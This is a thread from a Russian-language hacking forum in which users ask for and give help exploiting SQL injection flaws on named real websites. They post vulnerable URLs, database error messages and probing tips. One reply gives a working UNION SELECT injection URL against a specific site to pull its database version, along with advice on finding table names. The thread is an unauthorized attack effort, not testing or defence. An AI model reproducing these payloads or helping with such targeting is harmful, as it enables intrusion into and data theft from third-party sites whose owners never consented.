1. Пост двух одинаковых тем в разных разделах - бан.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

SQL непохек

Тема в разделе "Поиск уязвимостей", создана пользователем xeran, 1 сен 2008.

  1. Dr. MefistO
    Dr. MefistO Крывіч Глобальный модератор
    Симпатии:
    105
    Те, что без кавычки - прокатывают все! Т.е. ничего не выдает, кроме как "пароль или логин неверен!"
    Объясните мне: почему, если передавать все параметры через адресную строку, ничего не происходит, т.е. сообщение о том, что пароль или логин не верен не выдается, как это происходит при вводе в поля формы. Хотя на этой странице используются именно поля login и password? Такой ввод фильтруется сервером?

    Вот ссылка:
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 100 or greater.**
    Уязвимо поле Логин.
     
    Последнее редактирование: 19 дек 2010
    19 дек 2010
  2. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    потому что данные передаются не GET, а POST запросом.
    ps. сайт лежит.
     
    19 дек 2010
  3. Dr. MefistO
    Dr. MefistO Крывіч Глобальный модератор
    Симпатии:
    105
    Он вроде только для белорусских ИП.
     
    19 дек 2010
  4. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    Ищи разницу в +and+1 и +and+0
    С кавычками и без... с разными комментариями.
     
    20 дек 2010
  5. Last
    Last Новичок
    Симпатии:
    0
    Народ, здесь что-нибудь есть?
    Код:
    bratsk.org/news.html?page=-1
    Не могу подобать количество полей

    Ссылки, особенно указывающие на уязвимость, постить только в BB коде [ code ]
     
    Последнее редактирование модератором: 19 янв 2011
    18 янв 2011
  6. xeran
    xeran Продвинутый
    Симпатии:
    31
    Last,
    не все то золото, что блестит.
     
    18 янв 2011
  7. xeran
    xeran Продвинутый
    Симпатии:
    31
    туплю.
    Код:
    news.php?id=5
    собственно уязвимый параметр id.
    Код:
    news.php?id=5'
    error вида
    Код:
    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and status='Y')' at line 4
    мудрю с кавычкой, со скобкой все безуспешно.
    ваши предложения.
     
    20 фев 2011
  8. xmystikx
    xmystikx Новичок
    Симпатии:
    0
    Код:
    http://www.pskovedu.ru/?project_id=58'
    Перепробывал все, не могу найти видимое поле для вывода.Прошу помочь раскрутить.
     
    16 июн 2011
  9. xelaxter
    xelaxter Новичок
    Симпатии:
    1
    в ошибку выводить, любым из широко известных способов.
     
    22 авг 2011
  10. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    Firebird/InterBase Там ведь синтаксис другой. На форуме где-то был гайд по инжекту Firebird. Юзай поиск.
     
    11 сен 2011
  11. Hookman
    Hookman Developer Глобальный модератор
    Симпатии:
    202
    DJ Keylogger,
    Это тема SQL непохек. Тут помогают с разбором конкретных SQL инъекций. То что ты здесь постишь должно быть в этой теме.
     
    20 сен 2011
  12. wooka
    wooka Новичок
    Симпатии:
    1
    Помогите вытянуть пожалуйста
    Код:
    http://kinogildia.ru/pages/page.php?page=320-40
     
    27 дек 2012
    1 человеку нравится это.
  13. Mei
    Mei bit of love Продвинутый
    Симпатии:
    137
    wooka,
    Код:
    http://kinogildia.ru/pages/page.php?page=320+and+0+union+select+1,version(),3,4,5,6,7,8,9--
    Дальше сам подбирай, версия 4я. Префикс таблиц в ошибке, можно от этого отталкиваться.

    Добавлено через 8 минут
    Кстати, Apache 1.3.42
     
    Последнее редактирование: 27 дек 2012
    27 дек 2012
  14. romasjan
    romasjan Новичок
    Симпатии:
    0
    прошу помощи со скулей
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
     
    21 янв 2013
  15. kokolorka
    kokolorka Новичок
    Симпатии:
    0
    cellzone.pk/order.php тут пост
    pixelseshop.com/index.php?route=product/category&path=59
    не читаются таблицы
     
    11 окт 2017

Поделиться этой страницей

Загрузка...